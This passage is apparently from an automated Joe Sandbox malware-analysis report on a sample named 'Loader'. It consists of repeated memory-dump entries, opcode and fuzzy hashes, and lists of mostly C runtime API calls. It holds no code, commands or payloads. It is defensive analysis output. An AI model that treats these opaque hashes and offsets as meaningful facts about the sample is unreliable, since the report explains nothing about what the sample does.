                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f6d3825610b41e91197ba453ef466a61188bc5b3caf59aac110188e3e18479e5
                                                                                        • Instruction ID: a2567c92ef43b00eb5ac24927b4a0e67434e8ffca14489f9b64a438a09366c4a
                                                                                        • Opcode Fuzzy Hash: f6d3825610b41e91197ba453ef466a61188bc5b3caf59aac110188e3e18479e5
                                                                                        • Instruction Fuzzy Hash: 52515A37759A904FD32C8E3C4D622AA7A831FDB230F2D976FA5B1873F1C59848069355
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b144148cb8859e9ff4fb7675403b26957ea2f76ead6ccc25792ec572375a5cfb
                                                                                        • Instruction ID: 07da38b744f74d32d30d1671ecbd769a37b19a8d909b10be6a8f0c0ec6ed584f
                                                                                        • Opcode Fuzzy Hash: b144148cb8859e9ff4fb7675403b26957ea2f76ead6ccc25792ec572375a5cfb
                                                                                        • Instruction Fuzzy Hash: 904179329083E18FC314CF2988A06BBBFE2AFD3300F58586EE4C6A7252D6759945C791
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b977ccb32259706943ac51241a2e4b01e9ad14fb386f3d8fcca8a279d333aeb9
                                                                                        • Instruction ID: 9e509f52d19214b1ec568ce11ceb71cbfab3577535b604abfaf285835f568e3c
                                                                                        • Opcode Fuzzy Hash: b977ccb32259706943ac51241a2e4b01e9ad14fb386f3d8fcca8a279d333aeb9
                                                                                        • Instruction Fuzzy Hash: 1F41E1706083818BD725CF28C8A13ABB7E1FFD6310F09995ED8D64B391EB789841C756
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: a78404bcc6fe4ece50bdc3af6eb6688e542934eb8ccb81994019dd0ed9ba8f22
                                                                                        • Instruction ID: 92a325f3e00a29098394c1b7216cb9cdc88ca7f48b0bc32bbab928656b7252fc
                                                                                        • Opcode Fuzzy Hash: a78404bcc6fe4ece50bdc3af6eb6688e542934eb8ccb81994019dd0ed9ba8f22
                                                                                        • Instruction Fuzzy Hash: 784128362153009FD311EB25CC81F2BF7A6FB89304F29892DE58597390E735BD11878A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0de7ee3743d0cefefdb77df279ad24334a93a26d44c675ec6c7cacebd3144a97
                                                                                        • Instruction ID: 7aab301edbfea7bf465c4924b47dba305dd2912a928e775351cf07e8de8c6935
                                                                                        • Opcode Fuzzy Hash: 0de7ee3743d0cefefdb77df279ad24334a93a26d44c675ec6c7cacebd3144a97
                                                                                        • Instruction Fuzzy Hash: 4C315037E543309BD7248A38CC11BABB2D79BC5618F5EC269ED84A7399D9395C0183C5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 48405c969a7a08e59113c151e49b5b60c79020ffda652529cc0bc0ef9c5eae76
                                                                                        • Instruction ID: 7a8fcb3d106e3c360318abd82b338159047ca284191804e75a51eac247b9b9a3
                                                                                        • Opcode Fuzzy Hash: 48405c969a7a08e59113c151e49b5b60c79020ffda652529cc0bc0ef9c5eae76
                                                                                        • Instruction Fuzzy Hash: 9821253A6482019BD7348F14D881BFBB7A7E7C9314F1A853AD8C857262D674DC82CB59
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 5549f4b7ac97141825d5485b49639adccb38d18ed39ab62fccca178b8c61e4d3
                                                                                        • Instruction ID: 47583b5e97d7f103921451c9a3e00715a691b789a83416de6f265e9d05206047
                                                                                        • Opcode Fuzzy Hash: 5549f4b7ac97141825d5485b49639adccb38d18ed39ab62fccca178b8c61e4d3
                                                                                        • Instruction Fuzzy Hash: 2431F8BBA0456087D3249F05E44053BB3A2BF9D304F5B9A2EDDC663311C338DC61868B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: f50d2c4dc8ee9e2a8596cc8415937ea87727ca6414837429dafc031c6e91152d
                                                                                        • Instruction ID: e8aae8d7966c512091e9033bb6d6e6425441c1bb8404dc25c5ced89e9e60b8de
                                                                                        • Opcode Fuzzy Hash: f50d2c4dc8ee9e2a8596cc8415937ea87727ca6414837429dafc031c6e91152d
                                                                                        • Instruction Fuzzy Hash: 4B21293A64910087D7189B04EC916BA7313EBC6368F2A507ED9991735AC734DC83CA5D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cfe0eefe5808d62529e0812cc05e16a0e3c9f3a632ddf916af789bf4955350d2
                                                                                        • Instruction ID: 56270ea7693ceef52b1e7f48f884af2e6824f94f3014568ecd75d0ffec1498b1
                                                                                        • Opcode Fuzzy Hash: cfe0eefe5808d62529e0812cc05e16a0e3c9f3a632ddf916af789bf4955350d2
                                                                                        • Instruction Fuzzy Hash: CD215BB9918201EBE3009F10E802B7FB360EB86715F04083DF88557292D739DD568B4F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0674449b6d06b205b41c25d58161ab2b52f13015facc4a85c44fd5c36adca2a0
                                                                                        • Instruction ID: 469048f7263bc164ad3881534af0991a1148d7447d9efeb03a4489370524f0df
                                                                                        • Opcode Fuzzy Hash: 0674449b6d06b205b41c25d58161ab2b52f13015facc4a85c44fd5c36adca2a0
                                                                                        • Instruction Fuzzy Hash: 3F11E23BB2922107E350DF26DDD861B6352EBD631070A0135EE41E33C2CAB5F811D198
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: adb94da4f23613c99917977b7664bfbd9c61fed58edf43f45f6ea5e710422bf9
                                                                                        • Instruction ID: 11c6c97c577772a1d5d73abb7cc6e1959aec10da5a85461a06fefa762ba80ee7
                                                                                        • Opcode Fuzzy Hash: adb94da4f23613c99917977b7664bfbd9c61fed58edf43f45f6ea5e710422bf9
                                                                                        • Instruction Fuzzy Hash: C121053AB442624BC718CF3CC4601E9B7E35F8A31432D907ACC81FB355DA789D668B55
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0de891422f391cd0c84448b0de8363bf18e663a505ded699144067d5efbb09a1
                                                                                        • Instruction ID: 92971dc3d07923ada9f989ed8993decc668161824d2a2e66b9805621b63cc60e
                                                                                        • Opcode Fuzzy Hash: 0de891422f391cd0c84448b0de8363bf18e663a505ded699144067d5efbb09a1
                                                                                        • Instruction Fuzzy Hash: E811D673E1282047D32089198C007667656ABD9338F3E87B999789F3E2CD7B9C1386C4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                        • Instruction ID: 4a58b6b2eee891e707ae44f5c2f2057f1d0443dfb2677543873686b098ffc417
                                                                                        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                        • Instruction Fuzzy Hash: 11112C336441D00EC3119D3C94405A67F930AD7234F29539AF4B5973D2D5269D8A935D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4ae729b5eaa6ea3d3dd9b0738b38ff80b9ac0c8a54fdeafd4b704aef56e0587a
                                                                                        • Instruction ID: 689eb2972745fb3d0d71538539cd064f72764640edd73a05902de1ebbaa3ea99
                                                                                        • Opcode Fuzzy Hash: 4ae729b5eaa6ea3d3dd9b0738b38ff80b9ac0c8a54fdeafd4b704aef56e0587a
                                                                                        • Instruction Fuzzy Hash: 73019EF1B0531147D6209E11E9C0727B2A96B80708F0A057EEC0867742EB7EFC2486AB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f789347140fe938e4a4518c9f2bd9ce402decf9523efaaf8354aa9307fd6dce6
                                                                                        • Instruction ID: acf7ba5b93058e4802585720e30b957fa2021c5bc19bb66dde8fd7dea3a34763
                                                                                        • Opcode Fuzzy Hash: f789347140fe938e4a4518c9f2bd9ce402decf9523efaaf8354aa9307fd6dce6
                                                                                        • Instruction Fuzzy Hash: C211083660C2814AD708CB39C8A177BBBE24BE3204F5D857DD0D3D7AA6D628C5458755
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6f39adcb35a8e7c9b8f5557c3c687e47855718dd852e74ef07aa8537b368e77c
                                                                                        • Instruction ID: 5f93ce22784e692b25ceb2eda683e238adf69e50c1bc63fd0efb66c4fc782166
                                                                                        • Opcode Fuzzy Hash: 6f39adcb35a8e7c9b8f5557c3c687e47855718dd852e74ef07aa8537b368e77c
                                                                                        • Instruction Fuzzy Hash: 3B018139A481558BDB08CB54D4916BFB771BB4A314F29716DC84273351C339ED029B98
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 41e2dc4b17e3c8b404c4d996d53cf8311486e4b672f78a90eefd48d9649f6953
                                                                                        • Instruction ID: d79a2076f9fe415b663fa427f0a78d1c2c40fcc50cb9dc2d5069422736f63806
                                                                                        • Opcode Fuzzy Hash: 41e2dc4b17e3c8b404c4d996d53cf8311486e4b672f78a90eefd48d9649f6953
                                                                                        • Instruction Fuzzy Hash: 3FF0E538E056618FDB158F24D8F0067B761FB4BB34719526CC9522B3D1C2246852CB8C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 15ca70da37961cdd405244b3fe587cfd80ebb4a69d4062a7dacda6440bc4fe29
                                                                                        • Instruction ID: 0d8eb9bbe4c4616553cbf8c480240afe708ab0011c406d2b99dd3c7f213571ee
                                                                                        • Opcode Fuzzy Hash: 15ca70da37961cdd405244b3fe587cfd80ebb4a69d4062a7dacda6440bc4fe29
                                                                                        • Instruction Fuzzy Hash: 03C01238A8C0108B8608AF00D841035B2B6A78B268B24B46AC80233206D620A802C68C
                                                                                        APIs
                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 011C64CB
                                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 011C65D6
                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 011C6744
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                         • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                                                                        • String ID: csm$csm$csm
                                                                                        • API String ID: 1206542248-393685449
                                                                                        • Opcode ID: 7667d6d76c3a6d3428152f90d6edd85f536de97261fdde4661136c38ee2d8609
                                                                                        • Instruction ID: af93c17c54d85a508c88a5df50d7989bdf6421c6ca8f1e5a9c19a7fdc4d16aac
                                                                                        • Opcode Fuzzy Hash: 7667d6d76c3a6d3428152f90d6edd85f536de97261fdde4661136c38ee2d8609
                                                                                        • Instruction Fuzzy Hash: 8AB1797190021ADFCF1DDFA8D8809AEBBB6BF24B14B14456EE8106B312D731EA51CF91
                                                                                        APIs
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 011C4E07
                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 011C4E0F
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 011C4E98
                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 011C4EC3
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 011C4F18
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                         • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                        • String ID: csm
                                                                                        • API String ID: 1170836740-1018135373
                                                                                        • Opcode ID: 73d681002a8d5e326e43e2273668d5303b8844265cc8f0ea9160012d5f0dd64c
                                                                                        • Instruction ID: cc88a7ccb8815bbd39f18784da5762562a1b33de9aaed2d7b60ab1b8b44b8103
                                                                                        • Opcode Fuzzy Hash: 73d681002a8d5e326e43e2273668d5303b8844265cc8f0ea9160012d5f0dd64c
                                                                                        • Instruction Fuzzy Hash: AC412834A08219ABCF19DF6CC850A9EBFB1EF65B28F14805DD8149B381D735A901CF91
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(00000000,?,011CAF22,011CB787,?,00000000,00000000,00000000,?,011CB07C,00000022,FlsSetValue,011D2FBC,011D2FC4,00000000), ref: 011CAED4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                         • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID: api-ms-$ext-ms-
                                                                                        • API String ID: 3664257935-537541572
APIs
• GetLastError.KERNEL32(?,?,011C5478,011C514C,011C4998), ref: 011C548F
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 011C549D
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 011C54B6
• SetLastError.KERNEL32(00000000,011C5478,011C514C,011C4998), ref: 011C5508
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,011C5654,00000000,?,011D7CF4,?,?,?,011C57F7,00000004,InitializeCriticalSectionEx,011D1C18,InitializeCriticalSectionEx), ref: 011C56B0
• GetLastError.KERNEL32(?,011C5654,00000000,?,011D7CF4,?,?,?,011C57F7,00000004,InitializeCriticalSectionEx,011D1C18,InitializeCriticalSectionEx,00000000,?,011C5577), ref: 011C56BA
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 011C56E2
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
APIs
• GetConsoleOutputCP.KERNEL32(0EF9F6A5,00000000,00000000,?), ref: 011CCB30
  • Part of subcall function 011C9FA4: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,011CC7AB,?,00000000,-00000008), ref: 011CA005
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 011CCD82
